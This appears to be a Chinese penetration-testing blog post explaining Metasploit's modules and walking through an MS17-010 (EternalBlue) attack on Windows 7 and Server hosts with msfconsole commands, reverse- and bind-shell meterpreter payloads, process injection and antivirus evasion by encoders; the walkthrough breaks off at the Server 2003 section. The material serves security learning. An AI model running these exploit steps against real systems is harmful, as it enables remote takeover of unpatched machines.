首页 > 系统相关 >MSF及Windows渗透测试

MSF及Windows渗透测试

时间:2024-08-10 22:23:40浏览次数:13  
标签:Metasploit set 模块 漏洞 Windows 渗透 攻击 MSF

一、Metasploit Framework原理

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。

Metasploit的设计初衷是打造成一个攻击工具开发平台,本书稍后将讲解如何开发攻击工具。然而在目前情况下,安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。

这种可以扩展的模型将负载控制,编码器,无操作生成器和漏洞整合在一起,使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。最新版本的 MSF 包含了二千多种流行的操作系统及应用软件的漏洞,以及几百个 shellcode 。作为安全工具,它在安全检测中用着不容忽视的作用,并为漏洞自动化探测和及时检测系统漏洞提供了有力保障。

Metasploit自带上百种漏洞,还可以在online exploit building demo(在线漏洞生成演示)上看到如何生成漏洞。这使自己编写漏洞变得更简单,它势必将提升非法shellcode的水平,并且扩大网络阴暗面。与其相似的专业漏洞工具,如Core Impact和Canvas已经被许多专业领域用户使用。Metasploit降低了使用的门槛,将其推广给大众。

Metasploit的目标是,永远支持开源软件,促进社区参与,并提供最具创新性的渗透测试人员在世界各地的资源和工具。除了探索商业解决方案,致力于保持免费和开源的Metasploit框架。

MSF 主要模块介绍

下图为metasploit的模块组成图:

Auxiliaries (辅助模块)

该模块不会直接在测试者和目标主机之间建立访问,它们只负责执行扫描、嗅探、指纹识别等相关功能以辅助渗透测试。

Exploit (漏洞利用模块)

漏洞利用是指由渗透测试者利用一个系统、应用或者服务中的安全漏洞进行的攻击行为。流行的渗透攻击技术包括缓冲区溢出、Web应用程序攻击,以及利用配置错误等,其中包含攻击者或测试人员针对系统中的漏洞而设计的各种POC验证程序,用于破坏系统安全性的攻击代码,每个漏洞都有相应的攻击代码。

Payload (攻击载荷模块)

攻击载荷是我们期望目标系统在被渗透攻击之后完成实际攻击功能的代码,成功渗透目标后,用于在目标系统上运行任意命令或者执行特定代码,在Metasploit框架中可以自由地选择、传送和植入。攻击载荷也可能是简单地在目标操作系统上执行一些命令,如添加用户账号等。

Post (后期渗透模块)

该模块主要用于在取得目标系统远程控制权后,进行一系列的后渗透攻击动作,如获取敏感信息、实施跳板攻击等。

Encoders (编码工具模块)

该模块在渗透测试中负责免杀,以防止被杀毒软件、防火墙、IDS及类似的安全软件检测出来。

渗透攻击步骤

使用MSF渗透测试时,可以综合使用以上模块,对目标系统进行侦察并发动攻击,大致的步骤如下所示。

扫描目标机系统,寻找可用漏洞。

选择并配置一个漏洞利用模块。

选择并配置一个攻击载荷模块。

选择一个编码技术, 用来绕过杀毒软件的查杀。

渗透攻击。

启动MSF:

命令行输入如下命令即可启动:

#sudo msfdb init

#msfconsole

MS17-010漏洞介绍

当 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时,存在多个远程执行代码漏洞。成功利用这些漏洞的攻击者可以获取在目标系统上执行代码的能力。

MS17-010即永恒之蓝,他的爆发源于WannaCry勒索病毒的诞生。

该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。

MS17-010漏洞攻击内网主机的类型

可以攻击的内网主机类型有:

  1. Win7-x86
  2. Win7-x64
  3. WinServer2003
  4. WinServer2008

MS17-010漏洞攻击方式

MS17-010是历来是内网兵家必争之地(没有新的漏洞发掘之前),常常通过它来进行横向的渗透。但是不同的目标主机,利用方式有差异,需要根据情况调整才能成功攻击目标主机。

攻击之前的内网扫描:

#nmap -v -sn 172.16.20.0/24

#nmap -A -T4 172.16.20.120

1.X64系统

漏洞探测方式:

use auxiliary/scanner/smb/smb_ms17_010

set rhosts  192.168.2.149(目标主机的IP地址)

漏洞利用方式/漏洞攻击方式:

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp  (默认)

或者: set payload windows/x64/meterpreter/bind_tcp  (容易被防火墙和杀软拦截)

set rhost 192.168.2.149

run

2.X86系统(32位系统)

漏洞探测方式:

use auxiliary/scanner/smb/smb_ms17_010

set rhosts  192.168.2.149(目标主机的IP地址)

漏洞利用方式/漏洞攻击方式:

use exploit/windows/smb/eternalblue_doublepulsar

show target

set payload windows/meterpreter/reverse_tcp

或者:set payload windows/meterpreter/bind_tcp  (容易被防火墙和杀软拦截)

set processinject explorer.exe

set rhost 192.168.2.136

run

3.WinServer2003(32位系统)

漏洞探测方式:

标签:Metasploit,set,模块,漏洞,Windows,渗透,攻击,MSF
From: https://blog.csdn.net/qq_67812668/article/details/141072629

相关文章

  • Adobe Illustrator 2024 (macOS, Windows) - 矢量绘图下载
    一、AI软件简介AI(AdobeIllustrator)是一款广泛应用于图形设计、插画制作、标志设计等领域的专业矢量图形编辑软件。它以其强大的功能和灵活性,成为设计师们的重要工具之一。AI软件可以创建高质量的矢量图形,这些图形可以无限放大而不会失真。它提供了丰富的绘图工具、字体处......
  • 在 Windows 上使用 LCX(Local Channel eXchange)来进行本地和远程转发,此大纲旨在提供顶
    LCX(LocalChanneleXchange)通常指的是一种用于网络协议中的本地和远程转发技术。如果你在谈论的是与LCX相关的网络配置,它可能涉及不同的上下文,例如在通信协议或网络交换中。本地和远程转发的基本概念:本地转发(LocalForwarding):本地转发将本地计算机上的一个端口转发到......
  • mongo变更流使用及windows下副本集五分钟搭建
    mongodb的变更流解释:变更流(ChangeStreams)允许应用程序访问实时数据变更,从而避免事先手动追踪 oplog 的复杂性和风险。应用程序可使用变更流来订阅针对单个集合、数据库或整个部署的所有数据变更,并立即对它们做出响应。由于变更流采用聚合框架,因此,应用程序还可对特定变更进行......
  • 如何在 Windows 11/10/8/7 中恢复已删除和未保存的记事本文本文件
    很多原因都会导致未保存的记事本文本文件丢失。这些包括意外关闭、系统崩溃或电源故障等。无论丢失文本文件的原因是什么,相关的焦虑都是一样的。如果您遇到这种情况,可以使用以下有效方法在Windows11/10/8/7 中恢复已删除的文本文件。在这篇文章中,我们将分享三种在Windows......
  • 【攻防】一个关于内网渗透过程的小技巧
    在我们打攻防进行内网渗透的过程中,很多时候需要去收集内网的密码字典再对内网主机进行批量的密码喷洒。这里密码获取的手段有很多,例如:1、mimikatz抓取入口主机密码2、翻查入口主机中关于密码的文件(例如数据库密码)3、web系统的密码4、自己构造目标的密码字典(xxx@2024\xxx@2023......
  • Linux磁盘挂载windows文件夹
    一、mountmount命令用于加载文件系统到指定的加载点。此命令的最常用于挂载cdrom,使我们可以访问cdrom中的数据,因你将光盘插为入cdrom中,Linux并不会自动挂载,必须使用Linuxmount命令来手动完成挂载。语法mount(选项)(参数)选项-V:显示程序版本;-l:显示已加载的文件系统列表;-h:显......
  • Windows如何使用Alt+快捷键打出特殊符号
    原文出处:Windows电脑上如何使用Alt键加数字输出特殊符号数学符号和其他非英文字符的Alt码AltCodeSymbolalt224αalt225ßalt226Γalt227πalt228Σalt229σalt230µalt231τalt232Φalt233Θalt234Ωalt235δalt236∞alt237φalt238εalt239∩alt......
  • 解决Windows系统下cmd中ping命令无法使用的问题
    问题描述:当我配置Java环境变量后,发现ping命令无法使用。 问题分析:可能是环境变量配置上出了问题,还可能是PING.EXE被删除了。解决步骤:①“Win+R”打开运行窗口,输入:C:\Windows\System32 ②点击“确定”后,看是否能够找到PING.EXE(文件名顺序一般按字母顺序)。如果没......
  • WEB渗透Web突破篇-WAF绕过
    SQL注入分块传输https://github.com/c0ny1/chunked-coding-converter跑注入点被拦截使用分块传输,右键选择使用SQLMAP跑注入>pythonsqlmap.py-r1.txt--batch--proxy=http://127.0.0.1:8080--dbs自动提供可用的tamperAtlasGitHub-m4ll0k/At......
  • 【kali系列】Metasploit Framework (MSF) 从基础到进阶使用指南
    引言一、MetasploitFramework介绍1.1MSF概述1.2MSF主要组件二、MetasploitFramework基础安装与配置2.1KaliLinux中的MSF2.2非KaliLinux环境下的安装2.3更新与升级三、MetasploitFramework基础用法3.1启动MSF控制台......